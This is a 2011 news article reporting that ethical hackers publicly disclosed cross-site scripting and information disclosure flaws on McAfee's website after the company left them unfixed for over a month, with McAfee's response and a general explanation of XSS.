Security Holes Exposed on McAfee's Website

By on March 29th, 2011 13:41 GMT

McAfee has patched multiple cross-site scripting (XSS) and information disclosure vulnerabilities exposed by ethical hackers in its website.

The vulnerabilities were disclosed as zero-days on the Full Disclosure mailing list after McAfee failed to address them for over a month.

According to members of the YGN Ethical Hacker Group who found the security flaws, the security giant said on February 12 that it was working on resolving the issues.

However, on March 27 the vulnerabilities were still not fixed, which led to the group's decision to disclose them publicly.

In total there were three vulnerabilities identified, a cross-site scripting weakness in download.mcafee.com and two information disclosure bugs in www.mcafee.com and download.mcafee.com, respectively.

"It is important to note that these vulnerabilities do not expose any of McAfee's customer, partner or corporate information. Additionally, we have not seen any malicious exploitation of the vulnerabilities," the company said, according to CNET.

The coss-site scripting flaw could have allowed attackers to launch credible attacks that spoofed McAfee's brand. Given that McAfee is a trusted antivirus vendor, the impact of the attack would have increased considerably.

The information disclosure flaws allowed access to the site's source code and could have been used to find out details about McAfee's internal Web applications.

Cross-site scripting bugs are the most common type of vulnerabilities and can be found in almost any website, including those belonging to security vendors.

They stem from an insufficient validation of user input in forms and in the worst case scenario they allow for the injection of rogue code into Web pages.

McAfee is certainly not the first antivirus company with security vulnerabilities in its website, but the fact that it didn't address them for over a month is worrying.

XSS flaws usually take minutes to be fixed. That's the reason why most researchers disclose them as zero-days instead of notifying the vendor in advance.

Comments